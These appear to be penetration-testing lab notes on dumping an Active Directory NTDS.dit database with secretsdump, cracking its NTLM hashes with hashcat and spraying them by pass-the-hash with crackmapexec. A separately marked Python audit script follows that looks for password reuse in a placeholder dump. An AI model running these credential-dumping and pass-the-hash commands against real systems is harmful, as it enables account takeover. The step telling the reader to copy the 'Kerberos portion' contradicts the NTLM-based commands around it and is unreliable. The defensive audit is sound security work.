This use case covers the situation where you have access to an NTDS.dit file.
- This file is essentially the Active Directory database that holds all AD users, password hashes, objects, etc.
- As a result it is a gold mine, and its secrets can be dumped with secretsdump.
First, dump the NTDS.dit database file with secretsdump:
impacket-secretsdump -ntds ntds.dit -system SYSTEM -sam SAM LOCAL | tee secrets
Next, copy the Kerberos portion of the dump and put it in a file called secrets.txt (replace/overwrite as needed).
Then we can attempt to crack the hashes with Hashcat (mode 1000 is NTLM):
.\hashcat.exe -m 1000 hashes.txt .\rockyou.txt
- We can attempt a Pass-The-Hash attack
- First, we need to separate the users and hashes into two different files
users.txt:
cat secrets | cut -d":" -f1 | tee users.txt
cat users.txt
Administrator
Guest
RESOURCEDC$
krbtgt
M.Mason
K.Keen
L.Livingstone
J.Johnson
V.Ventz
S.Swanson
P.Parker
R.Robinson
D.Durant
G.Goldberg
- We now have a neat list of users
hashes.txt:
cat secrets | cut -d":" -f4 | tee hashes.txt
- We now have a neat list of hashes
crackmapexec winrm 192.168.81.175 -u users.txt -H hashes.txt
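The user/hash separation the two cut commands perform, plus the reuse and empty-password audit a defender would run over the same dump, as an added Python example that is not part of these notes. The sample dump, its banner text and every NT hash except the well-known empty-password hash are constructed placeholders, and resourced.local is only a stand-in domain prefix.

```python
import re
from collections import defaultdict

# Well-known NT hash of the empty password (a real constant, not constructed).
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# NTLM section line of secretsdump output: [domain\]user:rid:lmhash:nthash:::
NTLM_LINE = re.compile(
    r"^(?:[^\\:]+\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

# Constructed sample dump; every NT hash except EMPTY_NT is a made-up placeholder.
SAMPLE_DUMP = r"""
Impacket vX.Y.Z - placeholder banner line
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
resourced.local\M.Mason:1104:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
K.Keen:1105:aad3b435b51404eeaad3b435b51404ee:44444444444444444444444444444444:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000000
"""

def parse_ntlm_section(dump):
    """(user, nt_hash) pairs from the NTLM lines only: banner text and the
    Kerberos-key lines do not match NTLM_LINE and are skipped."""
    entries = []
    for line in dump.splitlines():
        m = NTLM_LINE.match(line.strip())
        if m:
            entries.append((m.group("user"), m.group("nt")))
    return entries

def split_users_and_hashes(entries):
    """The users.txt / hashes.txt columns, without the banner noise cut sees."""
    return [u for u, _ in entries], [h for _, h in entries]

def audit(entries):
    """Defender view: accounts using the empty password, and NT hashes shared
    by several accounts (password reuse). Machine accounts ($) are skipped."""
    by_hash = defaultdict(list)
    for user, nt in entries:
        if not user.endswith("$"):
            by_hash[nt].append(user)
    empty = by_hash.pop(EMPTY_NT, [])
    reused = {h: u for h, u in by_hash.items() if len(u) > 1}
    return empty, reused
```

The same audit run over a real dump shows which accounts a spray against the domain would hit through reuse, which is exactly the finding to report.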